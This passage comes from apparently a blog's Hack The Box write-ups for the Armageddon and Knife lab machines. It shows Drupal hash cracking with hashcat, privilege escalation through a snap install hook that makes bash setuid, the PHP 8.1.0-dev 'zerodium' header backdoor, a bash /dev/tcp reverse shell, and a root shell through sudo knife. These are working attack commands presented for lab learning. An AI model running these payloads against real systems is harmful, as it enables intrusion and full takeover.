1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt 1607076276

Lateral Movement

I saved the password hash to a file and searched on the hashcat example hashes web page for the type of hash. As a result, I learnt that hashes that start with ‘$S$’ appear to be specific to Drupal 7. The hashcat cracking mode for these hashes is 7900. I used hashcat to crack the hash which revealed that the password was booboo.

┌──(kali㉿kali)-[~/HTB/Armageddon]
└─$ sudo hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt
Armageddon hashcat

I then used the password to log in via SSH as the brucetherealadmin user. From here I was able to capture the user.txt password.

┌──(kali㉿kali)-[~/HTB/Armageddon]
└─$ ssh [email protected]
The authenticity of host '10.129.48.89 (10.129.48.89)' can't be established.
ED25519 key fingerprint is SHA256:rMsnEyZLB6x3S3t/2SFrEG1MnMxicQ0sVs9pFhjchIQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.48.89' (ED25519) to the list of known hosts.
[email protected]'s password:
Last login: Tue Mar 23 12:40:36 2021 from 10.10.14.2
[brucetherealadmin@armageddon ~]$ cat user.txt
e91▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓2fc

Armageddon Host Enumeration

With the user flag captured, I started enumerating the system. I tend to run some commands before resulting to LinPEASS. First, I tend to check to see if the user can run anything with sudo privileges. From running sudo -l, I learnt that the user could install snap packages.

[brucetherealadmin@armageddon ~]$ sudo -l
sudo -l

Next, I headed to GTFO Bins to see if there were any techniques that would allow me to exploit this privilege. As a result, I learnt that having the ability to run snap as sudo could allow privilege escalation. Since it snap doesn’t drop the elevated privileges it could be used to access the rest of the file system with those privileges.

gtfobins

I followed the example on GTFO bins but ran into a problem. When trying to execute the line starting with fpm, the system reported that the fpm command wasn’t found.

fpm not found

However, this reminded me of LXC and Docker container escapes. Perhaps if I created the snap locally and then uploaded it to the server, I could use the install command to install it. First I needed to install snap locally. I tried to run it and Kali was kind enough to tell me it could install it.

┌──(kali㉿kali)-[~/HTB/Armageddon]
└─$ snap
Command 'snap' not found, but can be installed with:
sudo apt install snapd
Do you want to install it? (N/y)y

I then installed FPM with gem as follows.

┌──(kali㉿kali)-[~/HTB/Armageddon]
└─$ sudo gem install --no-document fpm

Armageddon Privilege Escalation

The next step was to create the snap and download it onto the target box and install it. However, I ran into problems so I watched IppSec’s video >>HERE<< to guide me through it. First, on the target box, I copied /usr/bin/bash to /home/brucetherealadmin/bash.

[brucetherealadmin@armageddon ~]$ cp /usr/bin/bash ~/bash

Next, I modified the payload as shown below and executed it on my local system.

COMMAND="chown root:root /home/brucetherealadmin/bash; chmod 4755 /home/brucetherealadmin/bash"
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta

Then, I span up a Python webserver.

┌──(kali㉿kali)-[/tmp/tmp.fd5g4ogYTU]
└─$ sudo python3 -m http.server 8

Finally, I downloaded the snap using cURL and installed it.

[brucetherealadmin@armageddon tmp.daj9QvnIzU]$ curl http://10.10.14.54/xxxx_1.0_all.snap -o bash.snap

[brucetherealadmin@armageddon ~]$ sudo snap install bash.snap --dangerous --devmode

As you can see from the screenshot below, the snap was installed successfully. However, more importantly, it ran the command to change the ownership and permissions of the bash file. The file was now owned by root and had setuid set.

Armageddon bash exploited

I could now run the bash binary and capture the root flag.

[brucetherealadmin@armageddon ~]$ ./bash -p
bash-4.2# cat /root/root.txt
ace▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓138

Armageddon Learnings

I enjoyed this box but thought it was tricky once I had established a foothold. The method of gaining a foothold was simple. It helped me reinforce some Drupal knowledge and I learnt about the specific exploit. Once I was on the box I ran into problems. However, I learnt some valuable lessons about ways to interact with MySQL.

In theory, the privilege escalation should have been simple but I struggled. I haven’t done much with Snap so my brain automatically thought that it was harder than it was. Now that I’ve completed it, it seems easy. Anyway, another one bites the dust. Thanks for the box.

Hack The Box – Knife

Knife is an easy Linux box created by MrKN16H7 on Hack The Box and was released on the 22nd of May 2021. Hello world, welcome to Haxez where today I will explain how I hacked Knife. The suggested required knowledge to complete this box is enumeration, basic Knowledge of Linux and OWASP Top 10. The skills learned are web exploitation and knife sudo exploitation.

Knife Enumeration

First, I sent a ping request to the box to ensure it was online and that I could talk to it. Next, I performed a Nmap scan against all ports, running default scripts and requesting service versions. I set the minimum packet rate to 10000 and saved all outputs to a file named knife. As a result, I learnt that ports 22 for SSH and port 80 for HTTP were open. The SSH banner suggested the box had an Ubuntu operating system. The results from port 80 informed me that it was running Apache 2.4.41 and that the web application had the title Emergent Medial Idea.

┌──(kali㉿kali)-[~/HTB/Knife]
└─$ sudo nmap -sC -sV -p- 10.129.225.186 --min-rate 10000 -oA knife
Knife Enumeration

Web Application Enumeration

When performing Web Application penetration tests, there are two tools that I always run. First, I like to run whatweb to identify the technologies in use. I’m not sure how whatweb gathers its information but the results suggest it sends a request to the server and then checks the headers. From the results, I learnt that the Web Application was utilising PHP 8.1.0-dev. Not much else was reported back that Nmap hadn’t already discovered.

┌──(kali㉿kali)-[~/HTB/Knife]
└─$ sudo whatweb -a3 http://10.129.225.186/ -v
Knife Whatweb

Next, I like to run Nikto which is a web application vulnerability scanner. An initial scan with Nikto also identified the PHP version as 8.1.0-dev and reported that several security-related HTTP headers were missing but not much else.

Knife Nikto

I started to suspect where a vulnerability might be. However, I continued enumerating by visiting the web application and poking around. There wasn’t much to the application and the links didn’t appear to work.

Knife Web Application

PHP Backdoor Remote Code Execution

The PHP version had dev in the name which instantly made me suspicious. Consequently, I performed a Google search for the version and the top result was a GitHub repository for a backdoor RCE vulnerability. I wonder whether Nmap scripts or Burp Professional would have reported this as a finding. I might check that later.

PHP backdoor

Next, I navigated to the Exploit Database entry for this finding to view the code. As a result, I learnt that the backdoor checks to see if the User-Agentt header is present (notice the two tt’s) and whether that header has the value zerodium. If both those conditions are true then whatever comes directly after zerodium gets executed by eval.

Exploit DB PHP backdoor

For example, if I used the system function to execute the external ping command then I could use tcpdump and check if it pings my host. As you can see below, this is exactly what I did. I set tcpdump to listen on tun0 for ICMP packets. Next, I added the malicious header and my command to ping my host. Sure enough, the target sent 4 ICMP packets to my host.

┌──(kali㉿kali)-[~]
└─$ sudo tcpdump -i tun0 icmp
User-Agentt: zerodium system("ping -c 4 10.10.14.36");
Burp Ping

Knife Foothold

With remote code execution confirmed, I used it to gain a reverse shell on the host. First, I set up a netcat listener on port 1337. Next, I modified the ping command to a bash reverse shell. Finally, I sent the request and the application hung (good sign). I checked my netcat listener and I received a connection from the target host.

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 1337
User-Agentt: zerodium system("bash -c 'bash -i >& /dev/tcp/10.10.14.36/1337 0>&1'");
Reverse Shell

I now had access to the box as the james user and was able to capture the user.txt flag.

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.36] from (UNKNOWN) [10.129.225.186] 44714
james@knife:~$ cat user.txt
cat user.txt
ce1▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓64d

Knife Privilege Escalation

First, I used the private key in james’s .ssh directory to SSH back to the box. This achieved two things, the first being a more stable shell, and the second was persistence. Next, I ran sudo -l to see if james could execute any commands as root. As a result, I learnt that james could run knife as sudo.

james@knife:~$ sudo -l
Knife Sudo

Knife is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server. It helps users manage nodes, cookbooks and recipes, roles, environments, and data bags. Knife includes a collection of built-in subcommands that work together to provide the functionality required to take specific actions against any object in an organization. These subcommands allow knife to issue commands that interact with any object stored in the chef-repo or stored on the Chef Infra Server. Searching GTFO-Bins for knife, I learnt that knife can execute commands such as spawning a shell. Since I can run it as root, I should be able to give myself a root shell and capture the root.txt flag.

GTFO BINS

I copied the command and ran it. Sure enough, I was root and could capture the root flag.

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
f35▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓0b9

Knife Learnings

This was a fun box which taught me about the PHP backdoor vulnerability. I believe I had read about it a while ago but didn’t immediately associate the version with the vulnerability. I enjoyed learning about why it is vulnerable and how to exploit it. It helped to build up my knowledge of dangerous functions in PHP.

The privilege escalation was nice and simple and didn’t require much effort. I do enjoy a challenge but sometimes is nice to have an easy win. I learnt a bit about Knife and Chef which was good. There isn’t much more to say about the box honestly. It would be great for beginners and I had a lot of fun popping it. Thanks for the box.